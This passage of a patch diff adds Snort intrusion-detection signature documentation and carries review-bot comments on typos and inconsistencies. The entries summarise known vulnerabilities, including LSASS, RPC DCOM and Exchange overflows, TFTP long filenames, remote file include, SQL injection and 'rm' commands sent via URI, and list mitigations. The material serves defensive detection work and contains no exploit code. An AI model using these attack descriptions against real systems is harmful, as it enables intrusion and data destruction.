+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
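Review bot: the body of this file (Summary through Additional References) is word-for-word identical to 1115.txt, with only the Sid differing, so the documentation does not say what distinguishes rule 1148 from rule 1115; add at least one sentence in Detailed Information naming the request pattern this Sid matches. "the attackers choosing" in Impact should be "the attacker's choosing".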
--- /dev/null
+++ b/doc/signatures/2253.txt
@@ -0,0 +1,73 @@
+Rule:  
+
+--
+Sid:
+2253
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Exchange Server.
+
+--
+Impact:
+Serious. Possible execution of arbitrary code and Denial of Service
+(DoS).
+
+--
+Detailed Information:
+A vulnerability exists in versions of Microsoft Exchange Server such
+that it is possible for an attacker to execute arbitrary code or cause a
+DoS condition on the server without the need for prior authentication as
+a valid user.
+
+It is possible for an attacker to connect to the Exchange server on port
+25 and send an extended verb request to the server that will cause a
+large amount of memory to be allocated. In Exchange Server 5.5 this may
+cause a DoS, whilst in Exchange Server 2000 this same condition could
+present the attacker with an opportunity to execute arbitrary code.
+
+--
+Affected Systems:
+	MIcrosoft Exchange Server 5.5
+	Microsoft Exchange Server 2000
+
+--
+Attack Scenarios:
+The attacker can connect to port 25 of the server and send a specially
+crafted verb request.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft Corp.
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-046.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0714
+
+--
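Review bot: "MIcrosoft Exchange Server 5.5" in Affected Systems is a capitalisation typo for "Microsoft". "Rule:  " and the "-- " separator before Additional References carry trailing whitespace. Detailed Information says the condition is reached "without the need for prior authentication", which is the key severity point; it would help the reader if Impact said "unauthenticated" explicitly rather than leaving it to the third paragraph.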
--- /dev/null
+++ b/doc/signatures/1533.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1533
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
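Review bot: this file is identical to 1643.txt apart from the Sid, so it inherits the same problems: "running ona web server" should be "running on a web server", "the attackers choosing" should be "the attacker's choosing", and Additional References is empty despite the Summary's "known vulnerability". Add a sentence in Detailed Information saying which CGI request pattern rule 1533 matches so the two entries can be told apart.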
--- /dev/null
+++ b/doc/signatures/2612.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2612
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "revoke_surrogate_repcate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "userid" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
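Review bot: "a Oracle database implementation" in Summary should be "an Oracle database implementation". Detailed Information names the "revoke_surrogate_repcate" procedure but Attack Scenarios refers to "the "userid" variable" without saying it is a parameter of that procedure; tie the two together so the reader can see which parameter overflows. Attack Scenarios also states that the attack "requires an attacker to logon to the database with a valid username and password combination" (write "log on"), which is a material qualifier that Impact and Ease of Attack ("Simple.") should reflect. Affected Systems is indented with spaces rather than the tab used by the other files.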
--- /dev/null
+++ b/doc/signatures/100000524.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000524
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Micro CMS" application running on a webserver. 
+Access to the file "microcms-include.php" using a remote file being passed as 
+the "microcms_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "microcms_path" parameter in the "microcms-include.php" 
+script used by the "Micro CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Micro CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
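Review bot: as with the other 100000xxx entries, "may indicate that an exploitation attempt has been attempted" is tautological, "running ona web server" should be "running on a web server", and "the attackers choosing" should be "the attacker's choosing". The blank line between the Sid value and the next "--" separator, and between Affected Systems and its separator, is missing. The third Detailed Information paragraph (generic CGI credential checking) does not describe the remote file include via "microcms_path" in "microcms-include.php" and could be dropped.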
--- /dev/null
+++ b/doc/signatures/2052.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2052
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Sun Cobalt RaQ server appliances.
+
+--
+Impact:
+Execution of code and possible root compromise of the system.
+
+--
+Detailed Information:
+A vulnerability in the security hardening package for Sun Cobalt RaQ 4 
+and RaQ 3 running RaQ 4 does not filter user input to the email variable
+in the overflow.cgi script correctly.
+
+POST requests to the script may contain code in the email variable which
+will then be processed with the privilege of the super user on the 
+system.
+
+--
+Affected Systems:
+Sun Cobalt RaQ 4 Server Appliances with the Security Hardening Package 
+installed
+Sun Cobalt RaQ 3 Server Appliances running the RaQ 4 build with the 
+Security Hardening Package installed
+
+--
+Attack Scenarios:
+An attacker can supply his own POST request to the overflow.cgi script 
+that contains code he wishes to run.
+
+An exploit is also available.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/810921
+http://www.cert.org/advisories/CA-2002-35.html
+
+--
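Review bot: "Ease of Attack: Simple" lacks the terminating period used in the other files. Corrective Action ("Apply the appropriate vendor fixes.") would be more useful if it pointed at the CERT advisory already listed under Additional References (CA-2002-35) and said that the fix is to the Security Hardening Package named in Affected Systems. Detailed Information says the package "does not filter user input to the email variable in the overflow.cgi script correctly"; stating that the request is a POST there, as the next paragraph does, would make the detection condition clear in one place.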
--- /dev/null
+++ b/doc/signatures/1492.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1492
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
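Review bot: Affected Systems and Additional References are both empty. Detailed Information says the rule covers "web, web applications and ftp servers" while Attack Scenarios speaks only of "folders outside the ftp root directory"; state under Affected Systems which service this Sid applies to and make the two sections agree. "False Positives: None known" is doubtful for a generic traversal pattern, since legitimate relative paths can contain the same sequences; at least say which pattern the rule matches so operators can judge. There is a stray extra blank line under Additional References.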
--- /dev/null
+++ b/doc/signatures/2513.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2513
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
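Review bot: "suscessful" and "attcker" are typos ("successful", "attacker"), and "The problem lies in an unchecked buffer in the LSASS service, suscessful exploitation may present the attacker with the opportunity to gain control of the affected system." is a comma splice; split it into two sentences. Additional References is empty for a specific LSASS buffer overrun in "Microsoft Windows 2000, 2003 and XP"; the vendor bulletin should be cited. The first Corrective Action line "Apply the appropriate vendor supplied patches" lacks a period. The port list in Corrective Action (TCP/UDP 135 and 445, UDP 137/138, TCP 139/593) is the most actionable content here and is consistent with the RPC and SMB transports LSASS is reached over.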
--- /dev/null
+++ b/doc/signatures/2541.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2541
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
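Review bot: "attcker" in Attack Scenarios should be "attacker". In Detailed Information the comma in "SSL requests containing an invalid field, sent to vulnerable systems can cause the affected host to stop handling any further requests" is misplaced; either drop it or bracket "sent to vulnerable systems" with a pair of commas. Additional References is empty for a named Microsoft SSL library flaw affecting "Windows 2000, 2003 and XP systems using SSL"; cite the vendor bulletin. "Apply the appropriate vendor supplied patches" lacks a period.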
--- /dev/null
+++ b/doc/signatures/2325.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2325
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Virtual Programming VP-ASP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Virtual Programming VP-ASP web application running on a
+server. It may be possible to use SQL injection techniques to supply
+SQL code of an attackers choosing to the database used in the
+application.
+
+--
+Affected Systems:
+	Virtual Programming VP-ASP 4.0
+	Virtual Programming VP-ASP 5.0
+
+--
+Attack Scenarios:
+An attacker can inject SQL code of their choosing to view and manipulate
+data stored in the underlying database used by the application.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
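Review bot: "the attackers choosing" (Impact) and "an attackers choosing" (Detailed Information) should be "the attacker's choosing". Additional References is empty although Affected Systems names specific versions ("Virtual Programming VP-ASP 4.0" and "5.0"); the advisory for that SQL injection should be cited. Detailed Information repeats the Summary sentence verbatim before adding the SQL injection detail; the repeated sentence can go.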
--- /dev/null
+++ b/doc/signatures/3261.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3261
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
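Review bot: Attack Scenarios ("An attacker may make a request for a file with an overly long filename via a network share.") does not match Detailed Information, which describes "A malformed request to an RPC port" against DCOM; one of the two is wrong for this Sid and they need reconciling. "Expoit code exists" in Ease of Attack should be "Exploit code exists". Additional References is empty for a specific RPC DCOM overflow across the five listed Windows versions; cite the vendor bulletin. Corrective Action is good as written: blocking 135, 139 and 445 for both TCP and UDP at the perimeter matches the RPC transport named in Detailed Information.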
--- /dev/null
+++ b/doc/signatures/1941.txt
@@ -0,0 +1,184 @@
+Rule:
+
+--
+Sid:
+1941
+
+--
+Summary:
+This event is generated by an attempt to exploit a buffer overflow in TFTP file handling routines.
+
+--
+Impact:
+Implementation Dependent.  Several implementations of TFTP are vulnerable to a
+buffer overflow when processing long TFTP get requests.  This could allow
+arbitrary code execution or result in a Denial of Service condition.
+
+--
+Detailed Information:
+Insufficient bounds checking on requested filenames results in a simple to
+exploit buffer overflow condition.  This condition can be exploited by making
+a request for an overly long file name.
+
+Affected Systems:
+	Cisco IOS 11.1
+	Cisco IOS 11.2
+	Cisco IOS 11.3
+	ATFTP 0.6.0 and 0.6.1.1
+
+--
+Attack Scenarios:
+Attackers with access to TFTP can exploit this condition remotely by
+requesting an overly long file name.
+
+--
+Ease of Attack
+Depending on the configuration of the TFTP server this vulnerability can be exploited with a simple script.  Currently several exploits exist in the wild.
+
+--
+False Positives:
+Requests for legitimate file names of 100 or more bytes will trigger this rule. 
+
+--
+False Negatives
+Currently this rule checks for the existance of a file name of 100 or more bytes.  Vulnerable TFTP implemenations that experience faults with file names less than 100 bytes will not trigger this rule.
+
+--
+Corrective Action
+Cisco:
+For Cisco IOS 11.1, 11.2, 11.3 it is recommended that the TFTP service be disabled.  Cisco does not plan on releasing a patch for this problem.
+
+It may also be possible to mitigate this problem by creating an alias for all filenames being served via the TFTP service.  
+
+Example:
+tftp-server flash rsp-jv-mz.111-24a alias CiscoIOS 
+
+AFTP:
+    Debian Upgrade atftp_0.6.0woody1_alpha.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_alpha.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_alpha.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_alpha.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_arm.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_arm.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_arm.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_arm.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_i386.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_i386.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_i386.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_i386.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_ia64.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_ia64.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_ia64.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_ia64.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_hppa.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_hppa.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_hppa.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_hppa.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_m68k.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_m68k.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_m68k.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_m68k.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_mips.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_mips.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_mips.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_mips.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_mipsel.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_mipsel.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_mipsel.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_mipsel.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_powerpc.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_powerpc.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_powerpc.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_powerpc.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_s390.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_s390.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_s390.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_s390.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftp_0.6.0woody1_sparc.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftp_0.6.0woody1_sparc.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+    Debian Upgrade atftpd_0.6.0woody1_sparc.deb
+    http://security.debian.org/pool/updates/main/a/atftp/atftpd_0.6.0woody1_sparc.deb
+
+    Debian GNU/Linux 3.0 alias woody.
+
+--
+Contributors
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski matt.watchinski@sourcefire.com
+
+--
+Reference: 
+
+Bugtraq:
+http://www.securityfocus.com/bid/5328
+
+CVE:
+CAN-2002-0813
+
+
+
+--
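Review bot: the closing sections of this file break the template every other entry in the patch follows: "Contributors" lacks its colon, "Reference:" should be "Additional References:", and the CVE is given as a bare identifier (CAN-2002-0813) where the 602, 2351 and 1562 entries link to the cve.mitre.org page for the identifier. Separately, the per-architecture Debian package listing repeats "Debian GNU/Linux 3.0 alias woody." after every .deb URL; one line naming the affected release plus the Bugtraq and CVE references carries the same information and will not go stale the way a list of pool URLs does.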
--- /dev/null
+++ b/doc/signatures/2470.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2470
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
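Review bot: "False Positives: None Known" contradicts the Detailed Information, which states that anybody with administrative rights can access C$ remotely; legitimate remote administration (software deployment, backup agents, administrators copying files) will trigger this rule, and the section should say so and suggest excluding known management hosts. Corrective Action only mentions TCP port 139, while the 2508 and 2351 entries in this same patch block TCP 445 as well; the same advice should apply here so the three entries are consistent.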
--- /dev/null
+++ b/doc/signatures/1365.txt
@@ -0,0 +1,47 @@
+Rule:
+
+--
+Sid:
+1365
+
+--
+Summary:
+Attempted rm command access via web
+
+--
+Impact:
+Attempt to delete files on a webserver.
+
+--
+Detailed Information:
+This is an attempt to remove on a machine. Using this command an attacker may delete files on a machine.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'rm' in the URI which can then delete files present on the host.  This command may also be requested on a command line should the attacker gain access to the machine.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin.  Whenever possible, sensitive files and certain areas of the filesystem should have the system immutable flag set to negate the use of the rm command. On BSD derived systems, setting the systems runtime securelevel also prevents the securelevel from being changed. (note: the securelevel can only be increased)
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
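Review bot: the Detailed Information sentence "This is an attempt to remove on a machine" is missing its object (files), and the False Positives section is empty even though Attack Scenarios says the rule fires on any URI containing 'rm'; a substring that short will match ordinary paths and parameters, so this section should state that and advise reviewing the full request before acting. In Corrective Action, "it's designated web root" should read "its", and the securelevel sentence is circular ("setting the systems runtime securelevel also prevents the securelevel from being changed"); presumably the intended point is that raising the securelevel prevents the immutable flag from being cleared.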
--- /dev/null
+++ b/doc/signatures/2508.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2508
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
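Review bot: Additional References is empty while Corrective Action says "Apply the appropriate vendor supplied patches" without identifying them; the Microsoft bulletin and CVE for the LSASS buffer overrun should be listed, as the 2351 entry in this patch does for its vulnerability, so an analyst can confirm patch status. Typos in Detailed Information and Attack Scenarios: "suscessful" should read "successful" (and the comma splice there should be a full stop), "attcker" should read "attacker"; the first Corrective Action line lacks its full stop.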
--- /dev/null
+++ b/doc/signatures/1308.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1308
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
